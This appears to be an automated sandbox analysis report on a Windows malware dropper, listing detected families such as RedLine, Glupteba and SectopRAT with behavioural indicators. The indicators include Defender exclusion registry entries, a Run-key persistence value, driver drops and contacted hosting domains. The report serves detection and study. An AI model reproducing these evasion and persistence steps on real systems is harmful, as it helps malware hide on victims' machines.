Analysis Overview
SHA256
ad2a8edb56d190c0a1f70b3475fd5c850ba7f22bc756fb374fa3572cb0942e3f
Threat Level: Known bad
The file ad2a8edb56d190c0a1f70b3475fd5c850ba7f22bc756fb374fa3572cb0942e3f was found to be: Known bad.
Malicious Activity Summary
SectopRAT payload
PrivateLoader
Glupteba
Fabookie family
SectopRAT
Socelars family
Nullmixer family
Sectoprat family
Privateloader family
Detect Fabookie payload
RedLine payload
Redline family
Fabookie
Glupteba family
NullMixer
RedLine
Windows security bypass
Socelars payload
Socelars
Modifies boot configuration data using bcdedit
Command and Scripting Interpreter: PowerShell
Blocklisted process makes network request
Modifies Windows Firewall
Possible attempt to disable PatchGuard
Drops file in Drivers directory
Loads dropped DLL
ASPack v2.12-2.42
Executes dropped EXE
Windows security modification
Checks computer location settings
Reads user/profile data of web browsers
Legitimate hosting services abused for malware hosting/C2
Adds Run key to start application
Manipulates WinMonFS driver.
Checks installed software on the system
Looks up geolocation information via web service
Looks up external IP address via web service
Manipulates WinMon driver.
Suspicious use of SetThreadContext
Checks for VirtualBox DLLs, possible anti-VM trick
Drops file in Windows directory
Drops file in Program Files directory
Enumerates physical storage devices
Unsigned PE
Event Triggered Execution: Netsh Helper DLL
System Location Discovery: System Language Discovery
Program crash
Suspicious behavior: LoadsDriver
Suspicious use of AdjustPrivilegeToken
Suspicious use of FindShellTrayWindow
Suspicious behavior: GetForegroundWindowSpam
Scheduled Task/Job: Scheduled Task
Modifies system certificate store
Modifies Internet Explorer settings
Kills process with taskkill
Suspicious use of WriteProcessMemory
Modifies data under HKEY_USERS
Uses Task Scheduler COM API
Suspicious behavior: EnumeratesProcesses
MITRE ATT&CK
Analysis: static1
Detonation Overview
Reported
2024-11-09 21:27
Signatures
Unsigned PE
| Description | Indicator | Process | Target |
| --- | --- | --- | --- |
| N/A | N/A | N/A | N/A |
Analysis: behavioral1
Detonation Overview
Submitted
2024-11-09 21:27
Reported
2024-11-09 21:30
Platform
win7-20241023-en
Max time kernel
149s
Max time network
152s
Command Line
Signatures
Detect Fabookie payload
| Description | Indicator | Process | Target |
| --- | --- | --- | --- |
| N/A | N/A | N/A | N/A |
Fabookie
Fabookie family
Glupteba
Glupteba family
NullMixer
Nullmixer family
PrivateLoader
Privateloader family
RedLine
RedLine payload
| Description | Indicator | Process | Target |
| --- | --- | --- | --- |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
Redline family
SectopRAT
SectopRAT payload
| Description | Indicator | Process | Target |
| --- | --- | --- | --- |
| N/A | N/A | N/A | N/A |
Sectoprat family
Socelars
Socelars family
Socelars payload
| Description | Indicator | Process | Target |
| --- | --- | --- | --- |
| N/A | N/A | N/A | N/A |
Windows security bypass
| Description | Indicator | Process | Target |
| --- | --- | --- | --- |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Windows = "0" | C:\Users\Admin\AppData\Local\Temp\7zSC5B35246\Tue12f72da5484b.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Windows\windefender.exe = "0" | C:\Users\Admin\AppData\Local\Temp\7zSC5B35246\Tue12f72da5484b.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Windows\System32\drivers = "0" | C:\Users\Admin\AppData\Local\Temp\7zSC5B35246\Tue12f72da5484b.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Processes\csrss.exe = "0" | C:\Users\Admin\AppData\Local\Temp\7zSC5B35246\Tue12f72da5484b.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Processes\Tue12f72da5484b.exe = "0" | C:\Users\Admin\AppData\Local\Temp\7zSC5B35246\Tue12f72da5484b.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Windows\rss = "0" | C:\Users\Admin\AppData\Local\Temp\7zSC5B35246\Tue12f72da5484b.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Users\Admin\AppData\Local\Temp\csrss = "0" | C:\Users\Admin\AppData\Local\Temp\7zSC5B35246\Tue12f72da5484b.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Users\Admin\AppData\Roaming\CrimsonSnow = "0" | C:\Users\Admin\AppData\Local\Temp\7zSC5B35246\Tue12f72da5484b.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Users\Admin\AppData\Local\Temp\wup = "0" | C:\Users\Admin\AppData\Local\Temp\7zSC5B35246\Tue12f72da5484b.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Processes\windefender.exe = "0" | C:\Users\Admin\AppData\Local\Temp\7zSC5B35246\Tue12f72da5484b.exe | N/A |
Modifies boot configuration data using bcdedit
| Description | Indicator | Process | Target |
| --- | --- | --- | --- |
| N/A | N/A | C:\Windows\system32\bcdedit.exe | N/A |
| N/A | N/A | C:\Windows\system32\bcdedit.exe | N/A |
| N/A | N/A | C:\Windows\system32\bcdedit.exe | N/A |
| N/A | N/A | C:\Windows\system32\bcdedit.exe | N/A |
| N/A | N/A | C:\Windows\system32\bcdedit.exe | N/A |
| N/A | N/A | C:\Windows\system32\bcdedit.exe | N/A |
| N/A | N/A | C:\Windows\system32\bcdedit.exe | N/A |
| N/A | N/A | C:\Windows\system32\bcdedit.exe | N/A |
| N/A | N/A | C:\Windows\system32\bcdedit.exe | N/A |
| N/A | N/A | C:\Windows\system32\bcdedit.exe | N/A |
| N/A | N/A | C:\Windows\system32\bcdedit.exe | N/A |
| N/A | N/A | C:\Windows\system32\bcdedit.exe | N/A |
| N/A | N/A | C:\Windows\system32\bcdedit.exe | N/A |
| N/A | N/A | C:\Windows\system32\bcdedit.exe | N/A |
Blocklisted process makes network request
| Description | Indicator | Process | Target |
| --- | --- | --- | --- |
| N/A | N/A | C:\Windows\SysWOW64\rundll32.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\rundll32.exe | N/A |
Command and Scripting Interpreter: PowerShell
| Description | Indicator | Process | Target |
| --- | --- | --- | --- |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
Drops file in Drivers directory
| Description | Indicator | Process | Target |
| --- | --- | --- | --- |
| File created | C:\Windows\system32\drivers\Winmon.sys | C:\Windows\rss\csrss.exe | N/A |
Modifies Windows Firewall
| Description | Indicator | Process | Target |
| --- | --- | --- | --- |
| N/A | N/A | C:\Windows\system32\netsh.exe | N/A |
Possible attempt to disable PatchGuard
ASPack v2.12-2.42
| Description | Indicator | Process | Target |
| --- | --- | --- | --- |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
Executes dropped EXE
Loads dropped DLL
Reads user/profile data of web browsers
Windows security modification
| Description | Indicator | Process | Target |
| --- | --- | --- | --- |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Windows\System32\drivers = "0" | C:\Users\Admin\AppData\Local\Temp\7zSC5B35246\Tue12f72da5484b.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Processes\Tue12f72da5484b.exe = "0" | C:\Users\Admin\AppData\Local\Temp\7zSC5B35246\Tue12f72da5484b.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Windows\rss = "0" | C:\Users\Admin\AppData\Local\Temp\7zSC5B35246\Tue12f72da5484b.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Users\Admin\AppData\Local\Temp\csrss = "0" | C:\Users\Admin\AppData\Local\Temp\7zSC5B35246\Tue12f72da5484b.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Users\Admin\AppData\Roaming\CrimsonSnow = "0" | C:\Users\Admin\AppData\Local\Temp\7zSC5B35246\Tue12f72da5484b.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Processes\csrss.exe = "0" | C:\Users\Admin\AppData\Local\Temp\7zSC5B35246\Tue12f72da5484b.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Processes\windefender.exe = "0" | C:\Users\Admin\AppData\Local\Temp\7zSC5B35246\Tue12f72da5484b.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Windows = "0" | C:\Users\Admin\AppData\Local\Temp\7zSC5B35246\Tue12f72da5484b.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Windows\windefender.exe = "0" | C:\Users\Admin\AppData\Local\Temp\7zSC5B35246\Tue12f72da5484b.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Users\Admin\AppData\Local\Temp\wup = "0" | C:\Users\Admin\AppData\Local\Temp\7zSC5B35246\Tue12f72da5484b.exe | N/A |
Adds Run key to start application
| Description | Indicator | Process | Target |
| --- | --- | --- | --- |
| Set value (str) | \REGISTRY\USER\S-1-5-21-1163522206-1469769407-485553996-1000\Software\Microsoft\Windows\CurrentVersion\Run\CrimsonSnow = "\"C:\\Windows\\rss\\csrss.exe\"" | C:\Users\Admin\AppData\Local\Temp\7zSC5B35246\Tue12f72da5484b.exe | N/A |
Checks installed software on the system
Legitimate hosting services abused for malware hosting/C2
| Description | Indicator | Process | Target |
| --- | --- | --- | --- |
| N/A | iplogger.org | N/A | N/A |
| N/A | iplogger.org | N/A | N/A |
| N/A | iplogger.org | N/A | N/A |
| N/A | pastebin.com | N/A | N/A |
| N/A | pastebin.com | N/A | N/A |
| N/A | bitbucket.org | N/A | N/A |
| N/A | bitbucket.org | N/A | N/A |
| N/A | iplogger.org | N/A | N/A |
Looks up external IP address via web service
| Description | Indicator | Process | Target |
| --- | --- | --- | --- |
| N/A | ip-api.com | N/A | N/A |
Looks up geolocation information via web service
Manipulates WinMon driver.
| Description | Indicator | Process | Target |
| --- | --- | --- | --- |
| File opened for modification | \??\WinMon | C:\Windows\rss\csrss.exe | N/A |
Manipulates WinMonFS driver.
| Description | Indicator | Process | Target |
| --- | --- | --- | --- |
| File opened for modification | \??\WinMonFS | C:\Windows\rss\csrss.exe | N/A |
Suspicious use of SetThreadContext
| Description | Indicator | Process | Target |
| --- | --- | --- | --- |
| PID 1996 set thread context of 2924 | N/A | C:\Users\Admin\AppData\Local\Temp\7zSC5B35246\Tue12d6c3a590f5c.exe | C:\Users\Admin\AppData\Local\Temp\7zSC5B35246\Tue12d6c3a590f5c.exe |
| PID 1384 set thread context of 2884 | N/A | C:\Users\Admin\AppData\Local\Temp\7zSC5B35246\Tue1239d4b60d.exe | C:\Users\Admin\AppData\Local\Temp\7zSC5B35246\Tue1239d4b60d.exe |
| PID 1416 set thread context of 3044 | N/A | C:\Users\Admin\AppData\Local\Temp\7zSC5B35246\Tue12536443c2c8.exe | C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe |
Checks for VirtualBox DLLs, possible anti-VM trick
| Description | Indicator | Process | Target |
| --- | --- | --- | --- |
| File opened (read-only) | \??\VBoxMiniRdrDN | C:\Users\Admin\AppData\Local\Temp\7zSC5B35246\Tue12f72da5484b.exe | N/A |
Drops file in Program Files directory
| Description | Indicator | Process | Target |
| --- | --- | --- | --- |
| File created | C:\Program Files (x86)\Gparted\unins000.dat | C:\Users\Admin\AppData\Local\Temp\is-P53VS.tmp\Tue123e8bf9beda40e5.tmp | N/A |
| File created | C:\Program Files (x86)\Gparted\is-5Q2U2.tmp | C:\Users\Admin\AppData\Local\Temp\is-P53VS.tmp\Tue123e8bf9beda40e5.tmp | N/A |
| File created | C:\Program Files (x86)\Gparted\__tmp_rar_sfx_access_check_259443562 | C:\Program Files (x86)\Gparted\Build.sfx.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Gparted\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Gparted\Build.sfx.exe | C:\Users\Admin\AppData\Local\Temp\is-P53VS.tmp\Tue123e8bf9beda40e5.tmp | N/A |
| File opened for modification | C:\Program Files (x86)\Gparted\gimagex.exe | C:\Users\Admin\AppData\Local\Temp\is-P53VS.tmp\Tue123e8bf9beda40e5.tmp | N/A |
| File created | C:\Program Files (x86)\Gparted\is-3NF46.tmp | C:\Users\Admin\AppData\Local\Temp\is-P53VS.tmp\Tue123e8bf9beda40e5.tmp | N/A |
| File created | C:\Program Files (x86)\Gparted\is-7MSSK.tmp | C:\Users\Admin\AppData\Local\Temp\is-P53VS.tmp\Tue123e8bf9beda40e5.tmp | N/A |
| File opened for modification | C:\Program Files (x86)\Gparted\unins000.dat | C:\Users\Admin\AppData\Local\Temp\is-P53VS.tmp\Tue123e8bf9beda40e5.tmp | N/A |
| File created | C:\Program Files (x86)\Gparted\Build.exe | C:\Program Files (x86)\Gparted\Build.sfx.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Gparted\Build.exe | C:\Program Files (x86)\Gparted\Build.sfx.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Gparted\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Gparted\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
Drops file in Windows directory
| Description | Indicator | Process | Target |
| --- | --- | --- | --- |
| File created | C:\Windows\Logs\CBS\CbsPersist_20241109212805.cab | C:\Windows\system32\makecab.exe | N/A |
| File opened for modification | C:\Windows\rss | C:\Users\Admin\AppData\Local\Temp\7zSC5B35246\Tue12f72da5484b.exe | N/A |
| File created | C:\Windows\rss\csrss.exe | C:\Users\Admin\AppData\Local\Temp\7zSC5B35246\Tue12f72da5484b.exe | N/A |
Enumerates physical storage devices
Event Triggered Execution: Netsh Helper DLL
| Description | Indicator | Process | Target |
| --- | --- | --- | --- |
| Key queried | \REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh | C:\Windows\system32\netsh.exe | N/A |
| Key value enumerated | \REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh | C:\Windows\system32\netsh.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh | C:\Windows\system32\netsh.exe | N/A |
Program crash
| Description | Indicator | Process | Target |
| --- | --- | --- | --- |
| N/A | N/A | C:\Windows\SysWOW64\WerFault.exe | C:\Users\Admin\AppData\Local\Temp\7zSC5B35246\Tue125fd9410f80dd6.exe |
| N/A | N/A | C:\Windows\SysWOW64\WerFault.exe | C:\Program Files (x86)\Gparted\Build.exe |
System Location Discovery: System Language Discovery
| Description | Indicator | Process | Target |
| --- | --- | --- | --- |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\7zSC5B35246\Tue12f72da5484b.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\rss\csrss.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\7zSC5B35246\Tue120ba2d3df.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\7zSC5B35246\Tue121e696b2d94fe.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\7zSC5B35246\Tue1239d4b60d.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Program Files (x86)\Gparted\Build.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\7zSC5B35246\Tue12536443c2c8.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\7zSC5B35246\Tue129ba086d712.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\9d3b35dd52759c54dfe1d0b2853de31a745836acbbd30834237e24ea9f3a243d.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\7zSC5B35246\Tue1264f7b252.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\7zSC5B35246\Tue129ba086d712.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Program Files (x86)\Gparted\Build.sfx.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\7zSC5B35246\Tue1239d4b60d.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\is-P53VS.tmp\Tue123e8bf9beda40e5.tmp | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\is-D78U2.tmp\Tue129ba086d712.tmp | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\control.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\7zSC5B35246\Tue12d6c3a590f5c.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Program Files (x86)\Gparted\gimagex.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\7zSC5B35246\Tue12d6c3a590f5c.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\7zSC5B35246\Tue12b645e6648.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\7zSC5B35246\Tue122eaa5d903b51f3.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\is-9HKSK.tmp\Tue129ba086d712.tmp | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\mshta.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\taskkill.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\7zSC5B35246\setup_install.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\taskkill.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\YFBh.exE | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\rundll32.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\7zSC5B35246\Tue12f72da5484b.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\mshta.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\rundll32.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\7zSC5B35246\Tue121e696b2d94fe.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\mshta.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\7zSC5B35246\Tue125fd9410f80dd6.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\7zSC5B35246\Tue123e8bf9beda40e5.exe | N/A |
Kills process with taskkill
| Description | Indicator | Process | Target |
| --- | --- | --- | --- |
| N/A | N/A | C:\Windows\SysWOW64\taskkill.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\taskkill.exe | N/A |
Modifies Internet Explorer settings
| Description | Indicator | Process | Target |
| --- | --- | --- | --- |
| Key created | \REGISTRY\USER\S-1-5-21-1163522206-1469769407-485553996-1000\Software\Microsoft\Internet Explorer\Main | C:\Windows\SysWOW64\mshta.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-1163522206-1469769407-485553996-1000\Software\Microsoft\Internet Explorer\Main | C:\Windows\SysWOW64\mshta.exe | N/A |
Modifies data under HKEY_USERS
| Description | Indicator | Process | Target |
| --- | --- | --- | --- |
| Set value (str) | \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-672 = "AUS Eastern Standard Time" | C:\Users\Admin\AppData\Local\Temp\7zSC5B35246\Tue12f72da5484b.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-22 = "Cape Verde Standard Time" | C:\Users\Admin\AppData\Local\Temp\7zSC5B35246\Tue12f72da5484b.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-291 = "Central European Daylight Time" | C:\Users\Admin\AppData\Local\Temp\7zSC5B35246\Tue12f72da5484b.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-472 = "Ekaterinburg Standard Time" | C:\Users\Admin\AppData\Local\Temp\7zSC5B35246\Tue12f72da5484b.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-382 = "South Africa Standard Time" | C:\Users\Admin\AppData\Local\Temp\7zSC5B35246\Tue12f72da5484b.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\@%SystemRoot%\system32\tsgqec.dll,-103 = "Microsoft Corporation" | C:\Windows\system32\netsh.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-401 = "Arabic Daylight Time" | C:\Users\Admin\AppData\Local\Temp\7zSC5B35246\Tue12f72da5484b.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-412 = "E. Africa Standard Time" | C:\Users\Admin\AppData\Local\Temp\7zSC5B35246\Tue12f72da5484b.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-982 = "Kamchatka Standard Time" | C:\Users\Admin\AppData\Local\Temp\7zSC5B35246\Tue12f72da5484b.exe | N/A |
